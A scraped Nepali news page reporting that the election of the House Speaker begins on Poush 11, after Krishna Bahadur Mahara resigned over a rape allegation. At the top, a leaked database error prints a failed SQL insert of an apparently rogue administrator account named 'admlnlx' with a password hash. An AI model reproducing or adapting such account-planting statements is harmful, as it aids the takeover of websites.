WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm/t3c1wbXoarwu5yNdaPW.NUHft7F/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 00:55:23', '', 'admlnlx', 'admlnlx')

सभामुख चयनको प्रक्रिया पुस ११ गतेबाट सुरु हुने – Gaule Khabar

सभामुख चयनको प्रक्रिया पुस ११ गतेबाट सुरु हुने

सभामुख चयनको प्रक्रिया पुस ११ गतेबाट सुरु हुने

गाउँले न्युज, प्रतिनिधिसभामा सभामुख चयनको प्रक्रिया आगामी पुस ११ गतेबाट सुरु हुने भएको छ ।
आज शुक्रबार बसेको कार्यव्यवस्था परामर्श समितिको बैठकले सं‌सदको अर्को बैठक पुस ११ गते दिउँसो १ बजे बस्ने तय गरेको हो । उक्त बैठकले नै सभामुख चयनको प्रक्रिया अघि बढाउने भएको छ ।
बलत्कारको आरोप लागेपछि असोज १४ मा तत्कालिन सभामुख कृष्णबहादुर महराले पदबाट राजीनामा दिएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका